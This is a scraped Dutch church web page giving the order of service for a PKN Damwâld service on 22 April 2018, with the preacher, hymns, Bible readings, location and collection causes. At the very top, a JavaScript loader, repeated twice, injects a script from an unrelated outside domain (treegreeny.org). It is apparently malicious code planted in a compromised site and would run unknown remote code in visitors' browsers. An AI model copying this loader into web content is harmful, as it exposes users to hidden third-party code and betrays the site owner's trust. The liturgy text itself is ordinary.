;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 22 april 2018 9:30 uur - PKN Damwâld
zondag 22 april 2018
09:30 uur

Kerkdienst zondag 22 april 2018 9:30 uur

Informatie

Voorganger:Ds. T.A. Huttenga, Burgum
Liturgie
Lied voor de dienst Gezang 375 vs. 1, 5 en 7
Welkom en mededelingen
Aanvangslied : Psalm 100 vs. 1, 2 en 4
Groet en Bemoediging
Drempelgebed
We zingen: Elb 251
Gebed voor de nood van de wereld
We zingen: Gezang 294 vs. 1, 2, 4, 5 en 6
We lezen: Ezechiël 34: 1 – 12
We lezen: Johannes 10: 11 – 16
We zingen: Gezang 75 vs. 13, 14 en 15
Verkondiging .
We zingen: Psalm 107 vs. 1, 2 en 4
Gebeden
Collecte
Slotlied : Elb 79
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Eredienst en kerkmuziek wereldwijd

Op het gebied van vieringen is in onze protestantse gemeenten veel in ontwikkeling. Veel gemeenten zijn op zoek naar nieuwe manieren en andere muziek om de erediensten vorm te geven. Daarnaast is er een groei van het aantal plekken waar in het ritme van de dag of de week korte vieringen worden gehouden met veel aandacht voor stilte, ontmoeting met God en met de ander. Zoals in Doorn waar belangstellenden op alle dagen van de week kunnen meedoen in het morgengebed en het avondgebed. Het is een initiatief van een gemeenschap van vrijwilligers die op de adem van de getijden Gods lof zingt, en dagelijks Bijbel leest en bidt. De komende jaren bundelt de protestantse Kerk ervaringen en deelt materiaal om eigentijdse vormen van vieren een stimulans te geven

Tweede collecte: Kerk
Uitganscollecte: Bouwfonds